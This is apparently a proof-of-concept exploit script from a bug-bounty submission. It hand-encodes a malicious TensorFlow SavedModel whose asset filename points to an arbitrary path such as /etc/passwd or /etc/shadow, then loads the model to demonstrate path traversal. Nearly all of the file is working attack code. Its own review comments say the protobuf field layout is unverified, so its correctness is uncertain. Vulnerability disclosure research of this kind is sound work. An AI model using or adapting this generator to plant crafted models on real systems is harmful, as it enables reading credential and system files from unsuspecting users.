tf-savedmodel-traversal-poc / poc_exploit.py
Rodion111's picture
Upload poc_exploit.py with huggingface_hub
f542b4e verified
#!/usr/bin/env python3
"""
PoC: TensorFlow SavedModel AssetFileDef Path Traversal → Arbitrary File Read
CVE: TBD | CWE-22 | CVSS 7.5
Vulnerability:
tensorflow/python/saved_model/loader_impl.py — get_asset_tensors() builds
file paths for assets embedded in a SavedModel:
asset_filepath = file_io.join(
saved_model_dir,
constants.ASSETS_DIRECTORY, # "assets"
asset_def.filename # ← FROM THE MODEL FILE, NOT SANITIZED
)
tensor_info = ...
asset_tensor = tf.constant(asset_filepath, ...)
If asset_def.filename is an absolute path (e.g. '/etc/passwd'), Python's
os.path.join / file_io.join discards the base directory entirely; if it
contains '..' sequences, the base is kept but the joined path resolves
outside the assets directory. Either way an attacker-chosen filesystem
path leaks into tensors that feed downstream model computation.
Attack:
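An attacker crafts a SavedModel with an AssetFileDef whose filename field
is '/etc/passwd' (or any sensitive path). When the model is loaded, the
asset tensor holds that path (it is built from asset_filepath, as shown
above), so downstream computation that reads the asset operates on the
attacker-chosen file instead of a file under assets/.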
Usage:
python3 poc_exploit.py [target_path] # generates malicious SavedModel
python3 poc_exploit.py --trigger # also loads the model via TF
Default target: /etc/passwd
Author: security research (huntr.com submission)
"""
import sys
import os
import shutil
# Directory the generated SavedModel is written to (relative to the current
# working directory). create_malicious_savedmodel() deletes and recreates it
# on every run.
OUTPUT_DIR = 'malicious_savedmodel'
def create_malicious_savedmodel(target_path: str = '/etc/passwd') -> None:
    """
    Write a minimal SavedModel-shaped directory whose saved_model.pb embeds
    ``target_path`` as an AssetFileDef filename.

    Any existing OUTPUT_DIR is removed first, then this layout is created:

        malicious_savedmodel/
            saved_model.pb                      <- hand-encoded protobuf
            variables/
                variables.index                 <- empty placeholder
                variables.data-00000-of-00001   <- empty placeholder
            assets/                             <- created empty

    Args:
        target_path: String stored verbatim (UTF-8) in the filename field.

    Returns:
        None. The result is the directory on disk plus a summary printed to
        stdout.
    """
    # The protobuf is encoded by hand so TensorFlow is not required at
    # generation time.
    #
    # Simplified layout targeted by the encoding below:
    #   SavedModel   { meta_graphs = 2 (repeated MetaGraphDef) }
    #   MetaGraphDef { collection_def = 7 (map, key "saved_model_assets") }
    #   AssetFileDef { filename = 2 }
    # NOTE(review): these field numbers and the bytes_list nesting are not
    # checked against TensorFlow's .proto definitions anywhere in this file;
    # confirm them before relying on this layout.

    def encode_varint(value: int) -> bytes:
        """Encode a non-negative integer as a protobuf base-128 varint."""
        if value < 0:
            raise ValueError(f"varint value must be non-negative, got {value}")
        result = []
        while value > 0x7f:
            # Low 7 bits first, continuation bit set on all but the last byte.
            result.append((value & 0x7f) | 0x80)
            value >>= 7
        result.append(value)
        return bytes(result)

    def encode_message(field_num: int, data: bytes) -> bytes:
        """Encode ``data`` as a length-delimited (wire type 2) field."""
        # The tag is itself a varint, so field numbers >= 16 stay valid.
        tag = (field_num << 3) | 2
        return encode_varint(tag) + encode_varint(len(data)) + data

    def encode_string_field(field_num: int, value: str) -> bytes:
        """Encode ``value`` as a UTF-8 string field."""
        # Strings use the same length-delimited wire format as sub-messages.
        # The length has to be a varint: a single raw byte is only correct
        # below 128 bytes, and bytes() rejects values above 255 outright.
        return encode_message(field_num, value.encode('utf-8'))

    # AssetFileDef { filename: target_path }
    asset_file_def = encode_string_field(2, target_path)

    # Serialized AssetFileDef wrapped as one entry (field 1) of a list
    # message, which is in turn wrapped as field 1 of the CollectionDef.
    bytes_list_entry = encode_message(1, asset_file_def)
    bytes_list = encode_message(1, bytes_list_entry)

    # Map entry { key (field 1): "saved_model_assets", value (field 2): ... }
    map_key = encode_string_field(1, 'saved_model_assets')
    map_value = encode_message(2, bytes_list)
    map_entry = map_key + map_value
    collection_def = encode_message(7, map_entry)

    # The MetaGraphDef carries nothing but the collection_def entry.
    meta_graph = collection_def

    # SavedModel { meta_graphs: [meta_graph] }
    saved_model_pb = encode_message(2, meta_graph)

    # Start from a clean directory so files from a previous run cannot linger.
    if os.path.exists(OUTPUT_DIR):
        shutil.rmtree(OUTPUT_DIR)
    variables_dir = os.path.join(OUTPUT_DIR, 'variables')
    os.makedirs(variables_dir)
    os.makedirs(os.path.join(OUTPUT_DIR, 'assets'))

    pb_path = os.path.join(OUTPUT_DIR, 'saved_model.pb')
    with open(pb_path, 'wb') as f:
        f.write(saved_model_pb)

    # Empty variable files (the original author notes the loader requires them).
    for name in ('variables.index', 'variables.data-00000-of-00001'):
        with open(os.path.join(variables_dir, name), 'wb'):
            pass

    print(f"[*] Crafted malicious SavedModel in: {OUTPUT_DIR}/")
    print(f" Target file : {target_path}")
    print(f" saved_model.pb: {os.path.getsize(pb_path)} bytes")
    print(f" Attack: AssetFileDef.filename = '{target_path}'")
def main():
    """
    Command-line entry point: generate the SavedModel and optionally load it.

    Reads sys.argv directly:
      * the first argument starting with '/' is used as the target path
        (default: '/etc/passwd');
      * '--trigger' additionally loads the generated directory with
        TensorFlow, which is imported only in that case.
    """
    trigger = '--trigger' in sys.argv
    # NOTE(review): only arguments beginning with '/' are considered as the
    # target; any other argument (apart from --trigger) is silently ignored
    # and the default is used instead.
    target = next((a for a in sys.argv[1:] if a.startswith('/')), '/etc/passwd')
    create_malicious_savedmodel(target)
    print(f"[+] Malicious SavedModel written to: {OUTPUT_DIR}/")

    if not trigger:
        print("\n[i] Run with --trigger to demonstrate the traversal:")
        print(f" python3 {sys.argv[0]} --trigger")
        print(f" python3 {sys.argv[0]} /etc/shadow --trigger # target sensitive file")
        return

    print(f"\n[*] Triggering via tf.saved_model.load('{OUTPUT_DIR}')...")
    # Best-effort demonstration: any failure (TensorFlow not installed, the
    # loader rejecting the file, ...) is reported on stdout, not raised.
    try:
        import tensorflow as tf
        print(f" TensorFlow version: {tf.__version__}")
        # The returned object is not needed; only the load itself matters.
        tf.saved_model.load(OUTPUT_DIR)
        print("[+] Model loaded — checking for path traversal in assets...")
        # Load again through the lower-level loader, which returns the
        # MetaGraph so its collections can be inspected.
        from tensorflow.python.saved_model import loader_impl
        with tf.compat.v1.Session() as sess:
            meta = loader_impl.load(sess, ['serve'], OUTPUT_DIR)
            print("[+] MetaGraph loaded")
            if hasattr(meta, 'collection_def'):
                assets = meta.collection_def.get('saved_model_assets')
                if assets:
                    print(f"[+] Asset path in model: {assets}")
    except Exception as e:
        print(f"[~] Exception: {type(e).__name__}: {e}")
# Run the command-line entry point only when executed as a script, not when
# this module is imported.
if __name__ == '__main__':
    main()